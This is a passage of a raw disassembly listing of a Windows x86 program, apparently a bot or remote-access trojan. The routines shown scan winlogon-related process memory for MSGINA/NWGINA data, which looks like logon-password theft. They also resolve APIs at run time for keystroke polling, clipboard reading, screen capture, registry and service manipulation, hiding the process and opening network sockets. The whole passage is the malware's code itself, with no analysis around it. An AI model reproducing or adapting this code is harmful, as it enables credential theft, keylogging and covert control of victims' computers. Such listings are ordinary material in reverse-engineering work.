; sub_409209+7A�j ...
xor edi, edi
loc_4092F8: ; CODE XREF: sub_409209+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
mov eax, edi
loc_409306: ; CODE XREF: sub_409209+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_40930E: ; CODE XREF: sub_409209+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_409377
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_409324: ; CODE XREF: sub_409209+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40938B
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_409369
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_409369: ; CODE XREF: sub_409209+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_409324
loc_409377: ; CODE XREF: sub_409209+10F�j
test edi, edi
jz short loc_409382
push edi
call ds:dword_43AA40
loc_409382: ; CODE XREF: sub_409209+170�j
mov edi, [esp+28h+var_4]
jmp loc_4092F8
; ---------------------------------------------------------------------------
loc_40938B: ; CODE XREF: sub_409209+13C�j
xor eax, eax
jmp loc_409306
sub_409209 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409392 proc near ; CODE XREF: sub_409037+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_4240FC ;; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_4093BB
xor eax, eax
jmp loc_409536
; ---------------------------------------------------------------------------
loc_4093BB: ; CODE XREF: sub_409392+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_4240F8 ;; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_4240EC
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4240E8
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_4240F4
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_40940B
xor esi, esi
jmp loc_409529
; ---------------------------------------------------------------------------
loc_40940B: ; CODE XREF: sub_409392+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_4240F0 ;; VirtualQueryEx
test eax, eax
jz loc_409518
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_409518
test [ebp+var_2B], 1
jnz loc_409518
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_409518
loc_40946E: ; CODE XREF: sub_409392+112�j
push edi
push offset dword_439A38
call sub_422A52
pop ecx
test eax, eax
pop ecx
jnz short loc_409496
lea eax, [edi+200h]
push eax
push offset dword_43A238
call sub_422A52
pop ecx
test eax, eax
pop ecx
jz short loc_4094A6
loc_409496: ; CODE XREF: sub_409392+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_409518
jmp short loc_40946E
; ---------------------------------------------------------------------------
loc_4094A6: ; CODE XREF: sub_409392+102�j
test edi, edi
jz short loc_409518
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_4240B4 ;; FileTimeToLocalFileTime
test eax, eax
jz short loc_4094E1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_4240B0 ;; FileTimeToSystemTime
test eax, eax
jz short loc_4094E1
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_4094E1: ; CODE XREF: sub_409392+12B�j
; sub_409392+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov ds:dword_43AC5C, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_43AC54, eax
mov ds:dword_43AC58, edi
loc_409518: ; CODE XREF: sub_409392+90�j
; sub_409392+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
mov esi, [ebp+var_10]
loc_409529: ; CODE XREF: sub_409392+74�j
push [ebp+var_4]
call ds:off_424078
pop edi
mov eax, esi
pop ebx
loc_409536: ; CODE XREF: sub_409392+24�j
pop esi
leave
retn
sub_409392 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409539 proc near ; CODE XREF: sub_409037:loc_40912F�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_4240FC ;; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_40962B
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_4240F8 ;; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_409622
mov edi, ds:dword_4240EC
loc_409584: ; CODE XREF: sub_409539+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_4240F0 ;; VirtualQueryEx
test eax, eax
jz short loc_409610
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_409616
test [ebp+var_13], 1
jnz short loc_409616
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_4240E8 ;; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_4240F4 ;; ReadProcessMemory
test eax, eax
jz short loc_409602
push offset dword_439A38
push esi
call sub_422A52
pop ecx
test eax, eax
pop ecx
jnz short loc_409602
lea eax, [esi+400h]
push offset dword_43A238
push eax
call sub_422A52
pop ecx
test eax, eax
pop ecx
jz short loc_409632
loc_409602: ; CODE XREF: sub_409539+9F�j
; sub_409539+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
jmp short loc_409616
; ---------------------------------------------------------------------------
loc_409610: ; CODE XREF: sub_409539+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_409616: ; CODE XREF: sub_409539+71�j
; sub_409539+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_409584
loc_409622: ; CODE XREF: sub_409539+3F�j
push [ebp+arg_0]
call ds:off_424078
loc_40962B: ; CODE XREF: sub_409539+1E�j
xor eax, eax
loc_40962D: ; CODE XREF: sub_409539+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409632: ; CODE XREF: sub_409539+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_43AC54, ebx
mov ds:dword_43AC58, eax
cmp [eax], cl
jnz short loc_409654
cmp [eax+1], cl
jz short loc_40965C
loc_409654: ; CODE XREF: sub_409539+114�j
; sub_409539+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_409654
loc_40965C: ; CODE XREF: sub_409539+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:off_424078
push 1
pop eax
jmp short loc_40962D
sub_409539 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40966F proc near ; CODE XREF: sub_409037+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_43AC50
push esi
mov esi, ds:dword_4240EC
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_4240E8 ;; RtlAllocateHeap
mov ecx, ds:dword_43AC50
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push ds:dword_43AC58
push eax
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr ds:dword_43AC5C
push eax
call ds:dword_43AA3C
push [ebp+var_4]
mov edi, offset dword_43AA48
push offset dword_439A38
push offset dword_43A238
push [ebp+arg_0]
push offset unk_42CDC0
push 200h
push edi
call sub_41782A
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_40966F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409706 proc near ; CODE XREF: sub_409037:loc_409173�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_43AC50
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_4240EC ;; GetProcessHeap
push eax
call ds:dword_4240E8 ;; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_43A238
mov edi, 200h
mov esi, offset dword_439838
loc_40974C: ; CODE XREF: sub_409706+FA�j
mov eax, ds:dword_43AC50
add eax, eax
push eax
push ds:dword_43AC58
push [ebp+var_14]
call sub_417390
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call ds:dword_43AA3C
mov eax, ds:dword_43AC50
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_4097C1
loc_409789: ; CODE XREF: sub_409706+B3�j
cmp [ebp+var_8], 0
jz short loc_4097DE
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_4097AD
cmp byte ptr [ecx+1], 0
jnz short loc_4097AD
cmp dl, 20h
jnb short loc_4097A7
and [ebp+var_8], 0
loc_4097A7: ; CODE XREF: sub_409706+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_4097B1
loc_4097AD: ; CODE XREF: sub_409706+90�j
; sub_409706+96�j
and [ebp+var_8], 0
loc_4097B1: ; CODE XREF: sub_409706+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_409789
cmp [ebp+var_8], 0
jz short loc_4097DE
loc_4097C1: ; CODE XREF: sub_409706+81�j
push [ebp+var_14]
push offset dword_439A38
push ebx
push [ebp+arg_0]
push offset unk_42CDC0
push edi
push esi
call sub_41782A
add esp, 1Ch
jmp short loc_4097F6
; ---------------------------------------------------------------------------
loc_4097DE: ; CODE XREF: sub_409706+87�j
; sub_409706+B9�j
push offset dword_439A38
push ebx
push [ebp+arg_0]
push offset unk_42CE2C
push edi
push esi
call sub_41782A
add esp, 18h
loc_4097F6: ; CODE XREF: sub_409706+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_40974C
push [ebp+var_14]
push 0
call ds:dword_4240EC ;; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_409706 endp
; =============== S U B R O U T I N E =======================================
sub_40981F proc near ; CODE XREF: sub_40E6A9+48�p
push ebx
push ebp
mov ebp, ds:off_424100
push esi
push edi
push offset aKernel32_dll_1 ; "kernel32.dll"
call ebp ; sub_4DFF8C
mov esi, ds:off_4240DC
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40993F
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; sub_4E0076
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_43AE44, eax
call esi ; sub_4E0076
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_43ADB8, eax
call esi ; sub_4E0076
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_43AD9C, eax
call esi ; sub_4E0076
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_43ACB8, eax
call esi ; sub_4E0076
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_43AC64, eax
call esi ; sub_4E0076
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_43AC94, eax
call esi ; sub_4E0076
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_43AD08, eax
call esi ; sub_4E0076
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_43ADF8, eax
call esi ; sub_4E0076
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:off_43AE54, eax
call esi ; sub_4E0076
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_43ACC4, eax
call esi ; sub_4E0076
cmp ds:dword_43AE44, ebx
mov ds:dword_43ACAC, eax
jz short loc_40991D
cmp ds:dword_43ADB8, ebx
jz short loc_40991D
cmp ds:dword_43AD9C, ebx
jz short loc_40991D
cmp ds:dword_43ACB8, ebx
jz short loc_40991D
cmp ds:dword_43AC94, ebx
jz short loc_40991D
cmp ds:dword_43AD08, ebx
jz short loc_40991D
cmp ds:dword_43ADF8, ebx
jz short loc_40991D
cmp ds:off_43AE54, ebx
jz short loc_40991D
cmp ds:dword_43ACC4, ebx
jz short loc_40991D
cmp eax, ebx
jnz short loc_409927
loc_40991D: ; CODE XREF: sub_40981F+B8�j
; sub_40981F+C0�j ...
mov ds:dword_43AE58, 1
loc_409927: ; CODE XREF: sub_40981F+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; sub_4E0076
cmp eax, ebx
mov ds:dword_43ADD0, eax
jz short loc_409954
push 1
push ebx
call eax
jmp short loc_409954
; ---------------------------------------------------------------------------
loc_40993F: ; CODE XREF: sub_40981F+1D�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE5C, eax
mov ds:dword_43AE58, 1
loc_409954: ; CODE XREF: sub_40981F+117�j
; sub_40981F+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:off_4240E0
mov edi, eax
cmp edi, ebx
jz loc_409A69
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; sub_4E0076
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_43ADF4, eax
call esi ; sub_4E0076
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_43ADA4, eax
call esi ; sub_4E0076
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_43AD38, eax
call esi ; sub_4E0076
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_43AE48, eax
call esi ; sub_4E0076
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_43AD68, eax
call esi ; sub_4E0076
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_43AD88, eax
call esi ; sub_4E0076
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_43ADEC, eax
call esi ; sub_4E0076
cmp ds:dword_43ADF4, ebx
mov ds:dword_43ACE0, eax
jz short loc_409A0D
cmp ds:dword_43ADA4, ebx
jz short loc_409A0D
cmp ds:dword_43AD38, ebx
jz short loc_409A0D
cmp ds:dword_43AE48, ebx
jz short loc_409A0D
cmp ds:dword_43AD68, ebx
jz short loc_409A0D
cmp ds:dword_43AD88, ebx
jz short loc_409A0D
cmp ds:dword_43ADEC, ebx
jz short loc_409A0D
cmp eax, ebx
jnz short loc_409A17
loc_409A0D: ; CODE XREF: sub_40981F+1B8�j
; sub_40981F+1C0�j ...
mov ds:dword_43AE60, 1
loc_409A17: ; CODE XREF: sub_40981F+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; sub_4E0076
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_43AD64, eax
call esi ; sub_4E0076
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_43AC78, eax
call esi ; sub_4E0076
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_43AD34, eax
call esi ; sub_4E0076
cmp ds:dword_43AD64, ebx
mov ds:dword_43AD20, eax
jz short loc_409A74
cmp ds:dword_43AC78, ebx
jz short loc_409A74
cmp ds:dword_43AD34, ebx
jz short loc_409A74
cmp eax, ebx
jnz short loc_409A7E
jmp short loc_409A74
; ---------------------------------------------------------------------------
loc_409A69: ; CODE XREF: sub_40981F+144�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE64, eax
loc_409A74: ; CODE XREF: sub_40981F+232�j
; sub_40981F+23A�j ...
mov ds:dword_43AE60, 1
loc_409A7E: ; CODE XREF: sub_40981F+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; sub_4DFF8C
mov edi, eax
cmp edi, ebx
jz loc_409C19
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; sub_4E0076
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_43AE08, eax
call esi ; sub_4E0076
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_43AD4C, eax
call esi ; sub_4E0076
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_43ADBC, eax
call esi ; sub_4E0076
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_43ACA4, eax
call esi ; sub_4E0076
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_43AD04, eax
call esi ; sub_4E0076
cmp ds:dword_43AE08, ebx
mov ds:dword_43AD74, eax
jz short loc_409B09
cmp ds:dword_43AD4C, ebx
jz short loc_409B09
cmp ds:dword_43ADBC, ebx
jz short loc_409B09
cmp ds:dword_43ACA4, ebx
jz short loc_409B09
cmp ds:dword_43AD04, ebx
jz short loc_409B09
cmp eax, ebx
jnz short loc_409B13
loc_409B09: ; CODE XREF: sub_40981F+2C4�j
; sub_40981F+2CC�j ...
mov ds:dword_43AE68, 1
loc_409B13: ; CODE XREF: sub_40981F+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; sub_4E0076
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_43AD7C, eax
call esi ; sub_4E0076
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_43AD54, eax
call esi ; sub_4E0076
cmp ds:dword_43AD7C, ebx
mov ds:dword_43AE04, eax
jz short loc_409B4E
cmp ds:dword_43AD54, ebx
jz short loc_409B4E
cmp eax, ebx
jnz short loc_409B58
loc_409B4E: ; CODE XREF: sub_40981F+321�j
; sub_40981F+329�j
mov ds:dword_43AE68, 1
loc_409B58: ; CODE XREF: sub_40981F+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; sub_4E0076
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_43AD8C, eax
call esi ; sub_4E0076
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_43AC80, eax
call esi ; sub_4E0076
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_43AC88, eax
call esi ; sub_4E0076
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_43ACE8, eax
call esi ; sub_4E0076
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_43ACEC, eax
call esi ; sub_4E0076
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_43AC9C, eax
call esi ; sub_4E0076
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_43AD58, eax
call esi ; sub_4E0076
cmp ds:dword_43AD8C, ebx
mov ds:dword_43AC8C, eax
jz short loc_409BFC
cmp ds:dword_43AC80, ebx
jz short loc_409BFC
cmp ds:dword_43AC88, ebx
jz short loc_409BFC
cmp ds:dword_43ACE8, ebx
jz short loc_409BFC
cmp ds:dword_43ACEC, ebx
jz short loc_409BFC
cmp ds:dword_43AC9C, ebx
jz short loc_409BFC
cmp ds:dword_43AD58, ebx
jz short loc_409BFC
cmp eax, ebx
jnz short loc_409C06
loc_409BFC: ; CODE XREF: sub_40981F+3A7�j
; sub_40981F+3AF�j ...
mov ds:dword_43AE68, 1
loc_409C06: ; CODE XREF: sub_40981F+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; sub_4E0076
cmp eax, ebx
mov ds:dword_43AC84, eax
jnz short loc_409C2E
jmp short loc_409C24
; ---------------------------------------------------------------------------
loc_409C19: ; CODE XREF: sub_40981F+26A�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE6C, eax
loc_409C24: ; CODE XREF: sub_40981F+3F8�j
mov ds:dword_43AE68, 1
loc_409C2E: ; CODE XREF: sub_40981F+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; sub_4DFF8C
mov edi, eax
cmp edi, ebx
jz loc_409CFA
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; sub_4E0076
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_43AD84, eax
call esi ; sub_4E0076
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_43ADDC, eax
call esi ; sub_4E0076
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_43ADE4, eax
call esi ; sub_4E0076
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_43ADA0, eax
call esi ; sub_4E0076
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_43ACC8, eax
call esi ; sub_4E0076
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_43AC74, eax
call esi ; sub_4E0076
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_43ADE0, eax
call esi ; sub_4E0076
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_43AC60, eax
call esi ; sub_4E0076
cmp ds:dword_43AD84, ebx
mov ds:dword_43ACFC, eax
jz short loc_409D05
cmp ds:dword_43ADDC, ebx
jz short loc_409D05
cmp ds:dword_43ADE4, ebx
jz short loc_409D05
cmp ds:dword_43ADA0, ebx
jz short loc_409D05
cmp ds:dword_43ACC8, ebx
jz short loc_409D05
cmp ds:dword_43AC74, ebx
jz short loc_409D05
cmp ds:dword_43ADE0, ebx
jz short loc_409D05
cmp ds:dword_43AC60, ebx
jz short loc_409D05
cmp eax, ebx
jnz short loc_409D0F
jmp short loc_409D05
; ---------------------------------------------------------------------------
loc_409CFA: ; CODE XREF: sub_40981F+41A�j
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_43AE74, eax
loc_409D05: ; CODE XREF: sub_40981F+49B�j
; sub_40981F+4A3�j ...
mov ds:dword_43AE70, 1
loc_409D0F: ; CODE XREF: sub_40981F+4D7�j
mov ebp, ds:off_4240E0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; sub_4DFE83
mov edi, eax
cmp edi, ebx
jz loc_409FCB
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; sub_4E0076
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_43AD10, eax
call esi ; sub_4E0076
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_43AE3C, eax
call esi ; sub_4E0076
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_43ACB4, eax
call esi ; sub_4E0076
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_43AC90, eax
call esi ; sub_4E0076
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_43AD44, eax
call esi ; sub_4E0076
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_43AD2C, eax
call esi ; sub_4E0076
push offset aSocket ; "socket"
push edi
mov ds:dword_43ACF8, eax
call esi ; sub_4E0076
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_43AE18, eax
call esi ; sub_4E0076
push offset aConnect ; "connect"
push edi
mov ds:dword_43AE34, eax
call esi ; sub_4E0076
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_43AD40, eax
call esi ; sub_4E0076
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_43AE24, eax
call esi ; sub_4E0076
push offset aHtons ; "htons"
push edi
mov ds:dword_43ADD8, eax
call esi ; sub_4E0076
push offset aHtonl ; "htonl"
push edi
mov ds:dword_43AD98, eax
call esi ; sub_4E0076
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_43AD94, eax
call esi ; sub_4E0076
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_43ACD4, eax
call esi ; sub_4E0076
push offset aSend ; "send"
push edi
mov ds:dword_43ACCC, eax
call esi ; sub_4E0076
push offset aSendto ; "sendto"
push edi
mov ds:dword_43ADE8, eax
call esi ; sub_4E0076
push offset aRecv ; "recv"
push edi
mov ds:dword_43ADFC, eax
call esi ; sub_4E0076
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_43ADB0, eax
call esi ; sub_4E0076
mov ds:dword_43AD70, eax
push offset aBind ; "bind"
push edi
call esi ; sub_4E0076
push offset aSelect ; "select"
push edi
mov ds:dword_43ADC4, eax
call esi ; sub_4E0076
push offset aListen ; "listen"
push edi
mov ds:dword_43AD80, eax
call esi ; sub_4E0076
push offset aAccept ; "accept"
push edi
mov ds:dword_43ADC0, eax
call esi ; sub_4E0076
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_43AE2C, eax
call esi ; sub_4E0076
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_43AD78, eax
call esi ; sub_4E0076
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_43AD3C, eax
call esi ; sub_4E0076
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_43ADAC, eax
call esi ; sub_4E0076
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_43AE1C, eax
call esi ; sub_4E0076
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_43AD50, eax
call esi ; sub_4E0076
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_43ACF4, eax
call esi ; sub_4E0076
cmp ds:dword_43AD10, ebx
mov ds:dword_43AE30, eax
jz loc_409FD6
cmp ds:dword_43AE3C, ebx
jz loc_409FD6
cmp ds:dword_43ACB4, ebx
jz loc_409FD6
cmp ds:dword_43AD44, ebx
jz loc_409FD6
cmp ds:dword_43AD2C, ebx
jz loc_409FD6
cmp ds:dword_43ACF8, ebx
jz loc_409FD6
cmp ds:dword_43AE18, ebx
jz loc_409FD6
cmp ds:dword_43AE34, ebx
jz loc_409FD6
cmp ds:dword_43AD40, ebx
jz loc_409FD6
cmp ds:dword_43AE24, ebx
jz loc_409FD6
cmp ds:dword_43ADD8, ebx
jz loc_409FD6
cmp ds:dword_43AD98, ebx
jz loc_409FD6
cmp ds:dword_43AD94, ebx
jz loc_409FD6
cmp ds:dword_43ACD4, ebx
jz short loc_409FD6
cmp ds:dword_43ADE8, ebx
jz short loc_409FD6
cmp ds:dword_43ADFC, ebx
jz short loc_409FD6
cmp ds:dword_43ADB0, ebx
jz short loc_409FD6
cmp ds:dword_43AD70, ebx
jz short loc_409FD6
cmp ds:dword_43ADC4, ebx
jz short loc_409FD6
cmp ds:dword_43AD80, ebx
jz short loc_409FD6
cmp ds:dword_43ADC0, ebx
jz short loc_409FD6
cmp ds:dword_43AE2C, ebx
jz short loc_409FD6
cmp ds:dword_43AD78, ebx
jz short loc_409FD6
cmp ds:dword_43AD3C, ebx
jz short loc_409FD6
cmp ds:dword_43ADAC, ebx
jz short loc_409FD6
cmp ds:dword_43AE1C, ebx
jz short loc_409FD6
cmp ds:dword_43AD50, ebx
jz short loc_409FD6
cmp eax, ebx
jnz short loc_409FE0
jmp short loc_409FD6
; ---------------------------------------------------------------------------
